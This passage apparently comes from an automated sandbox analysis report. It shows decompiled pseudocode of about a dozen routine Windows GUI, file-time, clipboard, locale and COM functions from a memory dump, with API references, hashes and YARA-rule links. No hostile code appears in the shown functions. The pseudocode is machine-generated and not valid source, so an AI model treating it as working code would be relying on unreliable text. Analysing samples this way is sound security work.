				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E0044D894(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E0044D894(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E004466E4(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E00446370(_t52);
						return E00403814(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}

0x0044cf85
0x0044cf87
0x0044cf89
0x0044cf8e
0x0044cfa9
0x0044cfb2
0x0044cfe0
0x0044cfe0
0x0044cfe3
0x0044cfe9
0x0044cfef
0x0044cff4
0x0044cff9
0x0044cffb
0x0044cffd
0x0044d00f
0x0044d019
0x0044d024
0x0044d025
0x0044d026
0x0044d027
0x0044d033
0x0044d033
0x0044d038
0x0044d03a
0x00000000
0x0044d045
0x0044cfbb
0x0044cfc0
0x0044cfc2
0x00000000
0x00000000
0x0044cfd9
0x00000000
0x0044cf9d
0x0044cf9d
0x0044cfa3
0x0044d050
0x0044d050
0x00000000
0x0044cfa3

APIs

IsIconic.USER32(?), ref: 0044CFBB
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044CFD9
GetWindowPlacement.USER32(?,0000002C), ref: 0044D00F
SetWindowPlacement.USER32 ref: 0044D033

Strings

,, xrefs: 0044CFFD

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: 7293da94349a16b394f6be280665bfa224d6c4a90486748b610fe51e48919539
Instruction ID: 54eb6d6176d78dbd7ea17b4a752e87245738c08d12f695f0db95c2cdd56ca3f6
Opcode Fuzzy Hash: 7293da94349a16b394f6be280665bfa224d6c4a90486748b610fe51e48919539
Instruction Fuzzy Hash: 79218131A00204ABDF50EFADC8C199A77A9AF49314F04807BFD14EF346D639ED088B65

Uniqueness

Uniqueness Score: -1.00%

Function 00466DB4, Relevance: 7.6, APIs: 5, Instructions: 59
nativewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00466DB4(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E004664A0();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0044D590( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E00465D60( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E0044D590( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L0040703C();
					}
					if( *((short*)(_t40 + 0x11a)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x118))();
					}
				}
				return _t21;
			}

0x00466db6
0x00466db8
0x00466dbc
0x00466dc3
0x00466dcb
0x00466dd0
0x00466dd4
0x00466ddd
0x00466e41
0x00466e44
0x00466e00
0x00466e04
0x00466e16
0x00466e1c
0x00466e20
0x00466e25
0x00466e27
0x00466e2c
0x00466e31
0x00466e31
0x00466e34
0x00466e35
0x00466e35
0x00466e51
0x00000000
0x00466e5b
0x00466e51
0x00466e63

APIs

IsIconic.USER32(00000000), ref: 00466DBC
SetActiveWindow.USER32(00000000), ref: 00466DD4
IsWindowEnabled.USER32(00000000), ref: 00466DF7
SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040), ref: 00466E20
NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,?,?,00467488), ref: 00466E35

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledIconicNtdllProc_
String ID:
API String ID: 1720852555-0
Opcode ID: bca7cdaa525652728abd8e7376297c5d3f237f54542a5aa9c3fad3c72acfeb70
Instruction ID: 52c98efa6c877b43e729e8a02bf35b1e1eec244f1f03f0e47d67c18ea37e3382
Opcode Fuzzy Hash: bca7cdaa525652728abd8e7376297c5d3f237f54542a5aa9c3fad3c72acfeb70
Instruction Fuzzy Hash: B811E6717102009BDB54EE6DCDC5B97379C6F04704F4504AABE04DF28BE679EC408759

Uniqueness

Uniqueness Score: -1.00%

Function 0042FFC4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0042FFC4(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t22;

				_t19 = _a8;
				_t22 = _a4;
				if( *0x4bc92d != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t22) == 0) {
							GetWindowRect(_t22,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t22,  &_v48);
						}
						return E0042FF34( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x4bc908; // 0x42ffc4
				 *0x4bc908 = E0042FDB8(1, _t19, "MonitorFromWindow", _t21, _t22);
				return  *0x4bc908(_t22, _t19);
			}

0x0042ffcc
0x0042ffcf
0x0042ffd9
0x00430003
0x00430014
0x00430027
0x00430016
0x0043001b
0x0043001b
0x00000000
0x00430031
0x00000000
0x00430005
0x0042ffe0
0x0042ffed
0x00000000

Strings

MonitorFromWindow, xrefs: 0042FFDB

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: MonitorFromWindow
API String ID: 190572456-2842599566
Opcode ID: aeb33c342031030bd46b7049383622d89f433925aab56665642f34080a3ef699
Instruction ID: a51bd0da54437c844615d0cd75fc476061f2456429dd1ea41d42050c4c57b545
Opcode Fuzzy Hash: aeb33c342031030bd46b7049383622d89f433925aab56665642f34080a3ef699
Instruction Fuzzy Hash: BB01A261A051186B9714AB64ACC1AEF736C9B09314F84427BF801A7242D73DAD0687BE

Uniqueness

Uniqueness Score: -1.00%

Function 004412A8, Relevance: 6.0, APIs: 4, Instructions: 46
sleepCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004412A8(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x441325);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00440D08(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E00440908(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E00404898(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x44132c);
				return E004043D8( &_v8);
			}

0x004412ab
0x004412af
0x004412b3
0x004412b4
0x004412b9
0x004412bc
0x004412c1
0x004412cb
0x004412cd
0x004412cf
0x004412db
0x004412e9
0x004412f2
0x004412fb
0x0044130a
0x0044130a
0x00441311
0x00441314
0x00441317
0x00441324

APIs

Part of subcall function 00440D08: WinHelpA.USER32 ref: 00440D17

GetTickCount.KERNEL32(00000000,00441325,?,?,00000000,00000000,?,0044129E), ref: 004412C6
Sleep.KERNEL32(00000000,00000000,00441325,?,?,00000000,00000000,?,0044129E), ref: 004412CF
GetTickCount.KERNEL32(00000000,00000000,00441325,?,?,00000000,00000000,?,0044129E), ref: 004412D4
WinHelpA.USER32 ref: 0044130A

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CountHelpTick$Sleep
String ID:
API String ID: 2438605093-0
Opcode ID: 3bb6e543303d0611a19aaa3b16778c40e49144bad19f2fd867846b1e24a1b4d6
Instruction ID: f7d46849a138f27251039c1bcf1d4d4cb924ece5f15ad079f252087b08c14f06
Opcode Fuzzy Hash: 3bb6e543303d0611a19aaa3b16778c40e49144bad19f2fd867846b1e24a1b4d6
Instruction Fuzzy Hash: 5601A274700304AFF311FBB6CC52B1DB2E8DB48714F51447BF900E26D1DAB86E148569

Uniqueness

Uniqueness Score: -1.00%

Function 00409218, Relevance: 6.0, APIs: 4, Instructions: 37
timefileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409218(void* __eax) {
				short _v6;
				short _v8;
				struct _FILETIME _v16;
				struct _WIN32_FIND_DATAA _v336;
				void* _t16;

				_t16 = FindFirstFileA(E00404898(__eax),  &_v336);
				if(_t16 == 0xffffffff) {
					L3:
					_v8 = 0xffffffff;
				} else {
					FindClose(_t16);
					if((_v336.dwFileAttributes & 0x00000010) != 0) {
						goto L3;
					} else {
						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
							goto L3;
						}
					}
				}
				return _v8;
			}

0x00409233
0x0040923b
0x00409271
0x00409271
0x0040923d
0x0040923e
0x0040924a
0x00000000
0x0040924c
0x00409257
0x0040926f
0x00000000
0x00000000
0x0040926f
0x0040924a
0x0040927f

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00409233
FindClose.KERNEL32(00000000,00000000,?), ref: 0040923E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00409257
FileTimeToDosDateTime.KERNEL32 ref: 00409268

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FileTime$Find$CloseDateFirstLocal
String ID:
API String ID: 2659516521-0
Opcode ID: a6b4e9ad5fb658419c70fb21aeeefd77df78213f01bbc53f8a9f7d7aedf4cdd4
Instruction ID: b70f1ebf6ec9cd1db3f46cd636bcf547bc68ec0b8eaaa5dc923b172fd8b3778f
Opcode Fuzzy Hash: a6b4e9ad5fb658419c70fb21aeeefd77df78213f01bbc53f8a9f7d7aedf4cdd4
Instruction Fuzzy Hash: 61F09C7690020CA6CF10EAE58C859CFB3AC9B09324F5146B7A51AF21D2EA799A548B94

Uniqueness

Uniqueness Score: -1.00%

Function 0042C3D4, Relevance: 4.6, APIs: 3, Instructions: 51
fileclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042C3D4(intOrPtr* __eax, void* __ecx, void* __edx) {
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct tagENHMETAHEADER _v104;
				void* __ebp;
				intOrPtr _t35;
				intOrPtr* _t37;
				struct HENHMETAFILE__* _t43;
				intOrPtr _t44;

				_t37 = __eax;
				_t43 = GetClipboardData(0xe);
				if(_t43 == 0) {
					_t35 =  *0x4bb054; // 0x4263bc
					E0042979C(_t35);
				}
				E0042BB74(_t37);
				_t44 =  *((intOrPtr*)(_t37 + 0x28));
				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
				 *((short*)(_t44 + 0x18)) = 0;
				 *((char*)(_t37 + 0x2c)) = 1;
				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
				return  *((intOrPtr*)( *_t37 + 0x10))();
			}

0x0042c3dd
0x0042c3e6
0x0042c3ea
0x0042c3ec
0x0042c3f1
0x0042c3f1
0x0042c3f8
0x0042c3fd
0x0042c408
0x0042c415
0x0042c420
0x0042c429
0x0042c42c
0x0042c432
0x0042c442
0x0042c454

APIs

GetClipboardData.USER32 ref: 0042C3E1
CopyEnhMetaFileA.GDI32(00000000,00000000), ref: 0042C403
GetEnhMetaFileHeader.GDI32(?,00000064,?), ref: 0042C415

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMeta$ClipboardCopyDataHeader
String ID:
API String ID: 1752724394-0
Opcode ID: 487cacf69f0331f1c906158051967c160b569ea936d42cbfde1460f230ec2df8
Instruction ID: 79c58d506f8f2c1b6563931078e22f95eebc16529151f8c5af3271dbfe06b7cc
Opcode Fuzzy Hash: 487cacf69f0331f1c906158051967c160b569ea936d42cbfde1460f230ec2df8
Instruction Fuzzy Hash: D7115A327002048FD710DF6AC881A9ABBF8EF45310F10466EE909DB252DB75EC058B98

Uniqueness

Uniqueness Score: -1.00%

Function 00465B98, Relevance: 4.5, APIs: 3, Instructions: 33
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00465B98() {
				struct tagPOINT _v12;
				void* _t5;
				long _t6;

				 *0x4bcb8c = GetCurrentThreadId();
				L5:
				_t5 =  *0x4bcb90; // 0x0
				_t6 = WaitForSingleObject(_t5, 0x64);
				if(_t6 == 0x102) {
					if( *0x4bcb7c != 0 &&  *((intOrPtr*)( *0x4bcb7c + 0x60)) != 0) {
						GetCursorPos( &_v12);
						if(E00445594( &_v12) == 0) {
							E00468150( *0x4bcb7c);
						}
					}
					goto L5;
				}
				return _t6;
			}

0x00465ba9
0x00465bd9
0x00465bdb
0x00465be1
0x00465beb
0x00465bb3
0x00465bc1
0x00465bd0
0x00465bd4
0x00465bd4
0x00465bd0
0x00000000
0x00465bb3
0x00465bf1

APIs

GetCurrentThreadId.KERNEL32 ref: 00465BA4
GetCursorPos.USER32(?), ref: 00465BC1
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00465BE1

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentCursorObjectSingleThreadWait
String ID:
API String ID: 1359611202-0
Opcode ID: 6b87c510b3d35f27c40a357dbe9ecf953039954d855e1e18393d12fa120477f7
Instruction ID: f3bcb8b53c422d8efad3033fff3e0f01054954f3d13f0372bf941ca9f7b8778b
Opcode Fuzzy Hash: 6b87c510b3d35f27c40a357dbe9ecf953039954d855e1e18393d12fa120477f7
Instruction Fuzzy Hash: B6F0BE715086089BDB10A7AAECD6B9A33A8AB04714F10027BE5019B2D2FB7DB840C71F

Uniqueness

Uniqueness Score: -1.00%

Function 0044C6C8, Relevance: 3.1, APIs: 2, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044C6C8(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* _t25;
				intOrPtr* _t31;
				void* _t34;
				intOrPtr* _t37;
				void* _t45;

				_v8 = __edx;
				_t37 = __eax;
				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
					L8:
					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
						L10:
						return  *((intOrPtr*)( *_t37 - 0x10))();
					}
					_t25 = E0044C618(_t37, _t45);
					if(_t25 == 0) {
						goto L10;
					}
				} else {
					_t31 =  *0x4bb048; // 0x4bcb7c
					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
						goto L8;
					} else {
						_t34 = E0045E640(_t37);
						_t44 = _t34;
						if(_t34 == 0) {
							goto L8;
						} else {
							_t25 = E00447F3C(_t44, 0, 0xb017, _v8);
							if(_t25 == 0) {
								goto L8;
							}
						}
					}
				}
				return _t25;
			}

0x0044c6ce
0x0044c6d1
0x0044c6e3
0x0044c741
0x0044c751
0x0044c760
0x00000000
0x0044c767
0x0044c756
0x0044c75e
0x00000000
0x00000000
0x0044c712
0x0044c712
0x0044c71c
0x00000000
0x0044c71e
0x0044c720
0x0044c725
0x0044c729
0x00000000
0x0044c72b
0x0044c738
0x0044c73f
0x00000000
0x00000000
0x0044c73f
0x0044c729
0x0044c71c
0x0044c76e

APIs

IsIconic.USER32(?), ref: 0044C700
GetCapture.USER32 ref: 0044C709

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: 1125c6b5e53ac67e43753801714f2424ebff0da7a97411aaec34a3965aa0e451
Instruction ID: 47d4bc500aa6588ef6764907cb16cefd38e8b979bb7d0e39d79843db5ed861ad
Opcode Fuzzy Hash: 1125c6b5e53ac67e43753801714f2424ebff0da7a97411aaec34a3965aa0e451
Instruction Fuzzy Hash: 9F11A7397012169FEB50EB5DC9C6A6A73E4EF04354B2840BAF804DB352DB38ED448B5C

Uniqueness

Uniqueness Score: -1.00%

Function 0042982C, Relevance: 3.0, APIs: 2, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0042982C(void* __ebx) {
				char _v260;
				char _v264;
				long _t21;
				void* _t22;
				intOrPtr _t27;
				void* _t32;

				_v264 = 0;
				_push(_t32);
				_push(0x4298c8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32 + 0xfffffefc;
				_t21 = GetLastError();
				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
					E004297D8(_t22);
				} else {
					E00404648( &_v264, 0x100,  &_v260);
					E0040CAC4(_v264, 1);
					E00403DEC();
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(0x4298cf);
				return E004043D8( &_v264);
			}

0x00429838
0x00429840
0x00429841
0x00429846
0x00429849
0x00429851
0x00429855
0x004298aa
0x0042987b
0x0042988c
0x0042989e
0x004298a3
0x004298a3
0x004298b1
0x004298b4
0x004298b7
0x004298c7

APIs

GetLastError.KERNEL32(00000000,004298C8), ref: 0042984C
FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,004298C8), ref: 00429872

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: bfbab0248525acdc4e8402519c6228e75df5a367f1e6c58d69cb4829709ad775
Instruction ID: 2810bf6487d0360f9f49606d736321f083197a222a5217b023aae311aecbf2d7
Opcode Fuzzy Hash: bfbab0248525acdc4e8402519c6228e75df5a367f1e6c58d69cb4829709ad775
Instruction Fuzzy Hash: 140124703102285FE711FB21DC82BE973A8DB49704F9100BBFA04E26C1EAF96D40891C

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA20, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040DA20(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40da84);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E00404648( &_v16, 7,  &_v11);
				_push(_v16);
				E00408EF0(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040DA8B);
				return E004043D8( &_v16);
			}

0x0040da20
0x0040da29
0x0040da2e
0x0040da2f
0x0040da34
0x0040da37
0x0040da46
0x0040da56
0x0040da5e
0x0040da67
0x0040da70
0x0040da73
0x0040da76
0x0040da83

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040DA84), ref: 0040DA46
GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040DA84), ref: 0040DA5F

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 54e8359d692578a11701d0f73a9f01a078cfa47d70ce39cd87588749c2beabe2
Instruction ID: 4f93ef97ed049326357a9684263a2af2cd023a5d89af7a9ba365b2d61bb3a828
Opcode Fuzzy Hash: 54e8359d692578a11701d0f73a9f01a078cfa47d70ce39cd87588749c2beabe2
Instruction Fuzzy Hash: 1CF0F671E083046FDB00EBE2D84298DB3BBD7C9718F51C47AB910E36C1EA7C65008B58

Uniqueness

Uniqueness Score: -1.00%

Function 004709EC, Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E004709EC(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v32;
				intOrPtr _t28;
				intOrPtr _t29;
				void* _t33;
				void* _t34;
				intOrPtr _t35;
				void* _t36;

				_t36 = __eflags;
				_t27 = __edx;
				_t33 = _t34;
				_t35 = _t34 + 0xffffffe4;
				_v12 = 0;
				_v32 = 0;
				_v8 = __eax;
				_push(_t33);
				_push(0x470acc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				_push(_t33);
				_push(0x470a47);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				_push(E004060A8(__edx));
				_push(0x470adc);
				_push(5);
				_push(_v8);
				L004197BC();
				E0047097C(_v8, _t27, _t36);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_t29 = 0;
				 *[fs:eax] = _t29;
				_push(0x470ad3);
				E004043D8( &_v32);
				return E004043D8( &_v12);
			}

0x004709ec
0x004709ec
0x004709ed
0x004709ef
0x004709f7
0x004709fa
0x004709ff
0x00470a04
0x00470a05
0x00470a0a
0x00470a0d
0x00470a12
0x00470a13
0x00470a18
0x00470a1b
0x00470a25
0x00470a26
0x00470a2b
0x00470a32
0x00470a33
0x00470a38
0x00470a3f
0x00470a42
0x00470ab0
0x00470ab3
0x00470ab6
0x00470abe
0x00470acb

APIs

CoCreateInstance.OLE32(?,00000000,00000005,00470ADC,00000000), ref: 00470A33

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 9d130bab95c971011995da4130f7bd01a4ca61c4edad63b009eb0087fa706b59
Instruction ID: 9483664618284edb5ac08d0acefb72638e6329af10a925dc6aef0a56a9fb5d67
Opcode Fuzzy Hash: 9d130bab95c971011995da4130f7bd01a4ca61c4edad63b009eb0087fa706b59
